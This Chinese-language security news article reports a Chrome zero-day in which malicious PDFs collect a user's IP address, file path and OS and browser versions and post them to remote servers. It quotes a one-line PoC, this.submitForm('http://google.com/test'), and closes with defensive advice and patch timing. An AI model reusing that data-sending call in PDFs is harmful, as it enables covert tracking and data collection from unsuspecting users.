Chrome漏洞可让黑客通过pdf文件收集用户数据
目录:
漏洞检测服务EdgeSpot发现了一个利用PDF文档的引人入胜的Chrome零日漏洞。 利用此漏洞,攻击者可以使用在Chrome中打开的恶意PDF文档收集敏感数据。
一旦受害者在Google Chrome中打开相应的PDF文件,恶意程序就会通过收集用户数据开始在后台运行。
然后将数据转发到由黑客控制的远程服务器。 您可能想知道攻击者正在吸收哪些数据,它们将您的PC上的以下数据作为目标:
- IP地址
- 系统上PDF文件的完整路径
- 操作系统和Chrome版本
提防恶意软件驱动的PDF文件
当您使用Adobe Reader打开PDF文件时没有任何反应时,您可能会感到惊讶。 此外,HTTP POST请求用于将数据传输到远程服务器,而无需任何用户干预。
专家发现,两个域readnotifycom或burpcollaboratornet之一正在接收数据。
您可以通过考虑大多数防病毒软件无法检测到EdgeSpot检测到的样本这一事实来想象攻击的强度。
专家透露,攻击者正在使用“ this.submitForm()” PDF Javascript API来收集用户的敏感信息。
我们使用最小的PoC对其进行了测试,一个简单的API调用(例如“ this.submitForm('http://google.com/test')”)将使Google Chrome将个人数据发送至google.com。
专家实际上发现,此Chrome错误已被两组截然不同的恶意PDF文件利用。 两者分别于2017年10月和2018年9月发行。
值得注意的是,攻击者将来可以使用收集到的数据来微调攻击。 报告表明,第一批文件是使用ReadNotify的PDF跟踪服务编译的。
用户可以利用该服务来跟踪用户视图。 EdgeSpot尚未共享有关第二组PDF文件性质的任何详细信息。
如何保持保护
漏洞检测服务EdgeSpot希望向Chrome用户警告潜在的风险,因为预计该补丁不会在不久的将来发布。
EdgeSpot去年向Google报告了该漏洞,该公司承诺在4月底发布补丁。 H
但是,您可以考虑使用临时性的解决方法,方法是使用替代的PDF阅读器应用程序在本地查看收到的PDF文档。
另外,您也可以通过断开系统与Internet的连接来在Chrome中打开PDF文档。 同时,您可以等待预计于4月23日推出的Chrome 74更新。